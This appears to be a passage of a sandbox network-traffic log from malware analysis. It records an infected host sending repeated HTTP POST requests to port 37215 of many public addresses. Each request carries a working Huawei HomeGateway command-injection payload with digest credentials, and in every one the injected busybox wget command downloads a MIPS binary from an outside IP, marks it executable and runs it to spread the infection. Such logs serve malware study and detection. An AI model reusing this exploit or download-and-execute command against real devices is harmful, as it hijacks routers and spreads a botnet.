                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  870192.168.2.1351020157.251.10.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377667904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  871192.168.2.136092041.217.43.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377667904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  872192.168.2.1352446157.77.116.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377690077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  873192.168.2.1358770152.1.139.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377697945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  874192.168.2.1336990157.116.240.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.380280018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  875192.168.2.1346464197.164.16.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.380305052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  876192.168.2.1344544157.142.202.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.380321026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  877192.168.2.134738049.166.253.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.382764101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  878192.168.2.1339264197.205.152.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.382782936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  879192.168.2.135620441.170.182.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.382880926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 